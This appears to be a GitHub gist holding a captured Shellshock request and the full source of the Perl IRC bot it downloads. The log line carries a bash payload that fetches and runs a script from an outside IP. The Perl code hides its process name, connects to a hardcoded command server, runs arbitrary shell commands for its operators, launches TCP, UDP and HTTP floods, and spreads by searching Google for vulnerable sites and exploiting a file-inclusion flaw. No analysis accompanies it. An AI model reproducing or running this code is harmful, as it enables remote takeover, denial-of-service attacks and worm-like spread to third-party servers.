-
-
Save niladam/89635330d0ac4da7f55f to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
# this spreader is coded by xdh | |
# xdh@xxxxxxxxxxx | |
# only for testing... | |
my @nickname = ("|PHP|"); | |
my $nick = $nickname[rand scalar @nickname]; | |
my $ircname = $nickname[rand scalar @nickname]; | |
#system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`"); | |
my $processo = '/usr/sbin/atd'; | |
# funny world... | |
my $linas_max='6'; | |
my $sleep='5'; | |
my @adms=("JB","x"); | |
my @hostauth=("fuckoff","localhost"); | |
my @canais=("#new"); | |
chop (my $realname = 'vn'); | |
$servidor='185.31.209.84' unless $servidor; | |
my $porta='443'; | |
my $VERSAO = 'BUCEFALO'; | |
$SIG{'INT'} = 'IGNORE'; | |
$SIG{'HUP'} = 'IGNORE'; | |
$SIG{'TERM'} = 'IGNORE'; | |
$SIG{'CHLD'} = 'IGNORE'; | |
$SIG{'PS'} = 'IGNORE'; | |
use IO::Socket; | |
use Socket; | |
use IO::Select; | |
chdir("/tmp"); | |
#$servidor="$ARGV[0]" if $ARGV[0]; | |
$0="$processo"."\0"x16;; | |
my $pid=fork; | |
exit if $pid; | |
die "Problema com o fork: $!" unless defined($pid); | |
our %irc_servers; | |
our %DCC; | |
my $dcc_sel = new IO::Select->new(); | |
$sel_cliente = IO::Select->new(); | |
sub sendraw { | |
if ($#_ == '1') { | |
my $socket = $_[0]; | |
print $socket "$_[1]\n"; | |
} else { | |
print $IRC_cur_socket "$_[0]\n"; | |
} | |
} | |
sub conectar { | |
my $meunick = $_[0]; | |
my $servidor_con = $_[1]; | |
my $porta_con = $_[2]; | |
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); | |
if (defined($IRC_socket)) { | |
$IRC_cur_socket = $IRC_socket; | |
$IRC_socket->autoflush(1); | |
$sel_cliente->add($IRC_socket); | |
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; | |
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; | |
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; | |
nick("$meunick"); | |
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); | |
sendraw("PASS swedenrocks"); | |
sleep 1; | |
} | |
} | |
my $line_temp; | |
while( 1 ) { | |
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } | |
delete($irc_servers{''}) if (defined($irc_servers{''})); | |
my @ready = $sel_cliente->can_read(0); | |
next unless(@ready); | |
foreach $fh (@ready) { | |
$IRC_cur_socket = $fh; | |
$meunick = $irc_servers{$IRC_cur_socket}{'nick'}; | |
$nread = sysread($fh, $msg, 4096); | |
if ($nread == 0) { | |
$sel_cliente->remove($fh); | |
$fh->close; | |
delete($irc_servers{$fh}); | |
} | |
@lines = split (/\n/, $msg); | |
for(my $c=0; $c<= $#lines; $c++) { | |
$line = $lines[$c]; | |
$line=$line_temp.$line if ($line_temp); | |
$line_temp=''; | |
$line =~ s/\r$//; | |
unless ($c == $#lines) { | |
parse("$line"); | |
} else { | |
if ($#lines == 0) { | |
parse("$line"); | |
} elsif ($lines[$c] =~ /\r$/) { | |
parse("$line"); | |
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { | |
parse("$line"); | |
} else { | |
$line_temp = $line; | |
} | |
} | |
} | |
} | |
} | |
sub parse { | |
my $servarg = shift; | |
if ($servarg =~ /^PING \:(.*)/) { | |
sendraw("PONG :$1"); | |
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { | |
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; | |
if ($args =~ /^\001VERSION\001$/) { | |
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); | |
} | |
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { | |
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { | |
if ($onde eq "$meunick"){ | |
shell("$pn", "$args"); | |
} | |
if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) { | |
my $natrix = $1; | |
my $arg = $2; | |
if ($arg =~ /^\!(.*)/) { | |
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); | |
} elsif ($arg =~ /^\@(.*)/) { | |
$ondep = $onde; | |
$ondep = $pn if $onde eq $meunick; | |
bfunc("$ondep","$1"); | |
} else { | |
shell("$onde", "$arg"); | |
} | |
} | |
} | |
} | |
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { | |
if (lc($1) eq lc($meunick)) { | |
$meunick=$4; | |
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
} | |
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) { | |
nick("$meunick".int rand(9999)); | |
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { | |
$meunick = $2; | |
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick; | |
$irc_servers{$IRC_cur_socket}{'nome'} = "$1"; | |
foreach my $canal (@canais) { | |
sendraw("JOIN $canal ddosit"); | |
} | |
} | |
} | |
sub bfunc { | |
my $printl = $_[0]; | |
my $funcarg = $_[1]; | |
if (my $pid = fork) { | |
waitpid($pid, 0); | |
} else { | |
if (fork) { | |
exit; | |
} else { | |
if ($funcarg =~ /^portscan (.*)/) { | |
my $hostip="$1"; | |
my | |
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); | |
my (@aberta, %porta_banner); | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports."); | |
foreach my $porta (@portas) { | |
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout | |
=> 4); | |
if ($scansock) { | |
push (@aberta, $porta); | |
$scansock->close; | |
} | |
} | |
if (@aberta) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta"); | |
} else { | |
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); | |
} | |
} | |
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds."); | |
my $itime = time; | |
my ($cur_time); | |
$cur_time = time - $itime; | |
while ($3>$cur_time){ | |
$cur_time = time - $itime; | |
&tcpflooder("$1","$2","$3"); | |
} | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2."."); | |
} | |
if ($funcarg =~ /^version/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO); | |
} | |
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1." | |
seconds."); | |
srand; | |
my $itime = time; | |
my ($cur_time); | |
my ($exploited); | |
$boturl=$2; | |
$cur_time = time - $itime;$exploited = 0; | |
while($1>$cur_time){ | |
$cur_time = time - $itime; | |
@urls=fetch(); | |
foreach $url (@urls) { | |
$cur_time = time - $itime; | |
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; | |
$url =$path."/SQuery/lib/gore.php?libpath=$boturl?"; | |
$page = http_query($url); | |
$exploited = $exploited + 1; | |
} | |
} | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1." | |
seconds."); | |
} | |
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds."); | |
my $itime = time; | |
my ($cur_time); | |
$cur_time = time - $itime; | |
while ($2>$cur_time){ | |
$cur_time = time - $itime; | |
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); | |
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; | |
close($socket); | |
} | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1."."); | |
} | |
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for | |
".$3." seconds."); | |
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); | |
$dtime = 1 if $dtime == 0; | |
my %bytes; | |
$bytes{igmp} = $2 * $pacotes{igmp}; | |
$bytes{icmp} = $2 * $pacotes{icmp}; | |
$bytes{o} = $2 * $pacotes{o}; | |
$bytes{udp} = $2 * $pacotes{udp}; | |
$bytes{tcp} = $2 * $pacotes{tcp}; | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent | |
".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); | |
} | |
exit; | |
} | |
} | |
} | |
sub ircase { | |
my ($kem, $printl, $case) = @_; | |
if ($case =~ /^join (.*)/) { | |
j("$1"); | |
} | |
if ($case =~ /^part (.*)/) { | |
p("$1"); | |
} | |
if ($case =~ /^rejoin\s+(.*)/) { | |
my $chan = $1; | |
if ($chan =~ /^(\d+) (.*)/) { | |
for (my $ca = 1; $ca <= $1; $ca++ ) { | |
p("$2"); | |
j("$2"); | |
} | |
} else { | |
p("$chan"); | |
j("$chan"); | |
} | |
} | |
if ($case =~ /^op/) { | |
op("$printl", "$kem") if $case eq "op"; | |
my $oarg = substr($case, 3); | |
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); | |
} | |
if ($case =~ /^deop/) { | |
deop("$printl", "$kem") if $case eq "deop"; | |
my $oarg = substr($case, 5); | |
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); | |
} | |
if ($case =~ /^msg\s+(\S+) (.*)/) { | |
msg("$1", "$2"); | |
} | |
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { | |
for (my $cf = 1; $cf <= $1; $cf++) { | |
msg("$2", "$3"); | |
} | |
} | |
if ($case =~ /^ctcp\s+(\S+) (.*)/) { | |
ctcp("$1", "$2"); | |
} | |
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { | |
for (my $cf = 1; $cf <= $1; $cf++) { | |
ctcp("$2", "$3"); | |
} | |
} | |
if ($case =~ /^nick (.*)/) { | |
nick("$1"); | |
} | |
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { | |
conectar("$2", "$1", 6667); | |
} | |
if ($case =~ /^raw (.*)/) { | |
sendraw("$1"); | |
} | |
if ($case =~ /^eval (.*)/) { | |
eval "$1"; | |
} | |
} | |
sub shell { | |
my $printl=$_[0]; | |
my $comando=$_[1]; | |
if ($comando =~ /cd (.*)/) { | |
chdir("$1") || msg("$printl", "No such file or directory"); | |
return; | |
} | |
elsif ($pid = fork) { | |
waitpid($pid, 0); | |
} else { | |
if (fork) { | |
exit; | |
} else { | |
my @resp=`$comando 2>&1 3>&1`; | |
my $c=0; | |
foreach my $linha (@resp) { | |
$c++; | |
chop $linha; | |
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); | |
if ($c == "$linas_max") { | |
$c=0; | |
sleep $sleep; | |
} | |
} | |
exit; | |
} | |
} | |
} | |
sub tcpflooder { | |
my $itime = time; | |
my ($cur_time); | |
my ($ia,$pa,$proto,$j,$l,$t); | |
$ia=inet_aton($_[0]); | |
$pa=sockaddr_in($_[1],$ia); | |
$ftime=$_[2]; | |
$proto=getprotobyname('tcp'); | |
$j=0;$l=0; | |
$cur_time = time - $itime; | |
while ($l<1000){ | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
$t="SOCK$l"; | |
socket($t,PF_INET,SOCK_STREAM,$proto); | |
connect($t,$pa)||$j--; | |
$j++;$l++; | |
} | |
$l=0; | |
while ($l<1000){ | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
$t="SOCK$l"; | |
shutdown($t,2); | |
$l++; | |
} | |
} | |
sub udpflooder { | |
my $iaddr = inet_aton($_[0]); | |
my $msg = 'A' x $_[1]; | |
my $ftime = $_[2]; | |
my $cp = 0; | |
my (%pacotes); | |
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; | |
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; | |
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; | |
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; | |
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; | |
return(undef) if $cp == 4; | |
my $itime = time; | |
my ($cur_time); | |
while ( 1 ) { | |
for (my $porta = 1; $porta <= 65000; $porta++) { | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; | |
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; | |
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; | |
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; | |
for (my $pc = 3; $pc <= 255;$pc++) { | |
next if $pc == 6; | |
$cur_time = time - $itime; | |
last if $cur_time >= $ftime; | |
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; | |
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; | |
} | |
} | |
last if $cur_time >= $ftime; | |
} | |
return($cur_time, %pacotes); | |
} | |
sub ctcp { | |
return unless $#_ == 1; | |
sendraw("PRIVMSG $_[0] :\001$_[1]\001"); | |
} | |
sub msg { | |
return unless $#_ == 1; | |
sendraw("PRIVMSG $_[0] :$_[1]"); | |
} | |
sub notice { | |
return unless $#_ == 1; | |
sendraw("NOTICE $_[0] :$_[1]"); | |
} | |
sub op { | |
return unless $#_ == 1; | |
sendraw("MODE $_[0] +o $_[1]"); | |
} | |
sub deop { | |
return unless $#_ == 1; | |
sendraw("MODE $_[0] -o $_[1]"); | |
} | |
sub j { &join(@_); } | |
sub join { | |
return unless $#_ == 0; | |
sendraw("JOIN $_[0]"); | |
} | |
sub p { part(@_); } | |
sub part { | |
sendraw("PART $_[0]"); | |
} | |
sub nick { | |
return unless $#_ == 0; | |
sendraw("NICK $_[0]"); | |
} | |
sub quit { | |
sendraw("QUIT :$_[0]"); | |
} | |
# Spreader | |
# this 'spreader' code isnot mine, i dont know who coded it. | |
# update: well, i just fix0red this shit a bit. | |
# | |
sub fetch(){ | |
my $rnd=(int(rand(9999))); | |
my $n= 80; | |
if ($rnd<5000) { $n<<=1;} | |
my $s= (int(rand(10)) * $n); | |
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx", | |
"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec", | |
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop", | |
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi", | |
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk", | |
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir", | |
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke", | |
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm", | |
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc", | |
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz", | |
"vu","vn","ye","yu","cd","zm","zw",""); | |
my @str; | |
foreach $dom (@dominios) | |
{ | |
push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20"); | |
} | |
my $query="www.google.com/search?q="; | |
$query.=$str[(rand(scalar(@str)))]; | |
$query.="&num=$n&start=$s"; | |
my @lst=(); | |
my $page = http_query($query); | |
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){ | |
if ($1 !~ m/google|cache|translate/){ | |
push (@lst,$1); | |
} | |
} | |
return (@lst); | |
} | |
sub http_query($){ | |
my ($url) = @_; | |
my $host=$url; | |
my $query=$url; | |
my $page=""; | |
$host =~ s/href=\"?http:\/\///; | |
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; | |
$query =~s/$host//; | |
if ($query eq "") {$query="/";}; | |
eval { | |
local $SIG{ALRM} = sub { die "1";}; | |
alarm 10; | |
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; | |
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; | |
my @r = <$sock>; | |
$page="@r"; | |
alarm 0; | |
close($sock); | |
}; | |
return $page; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment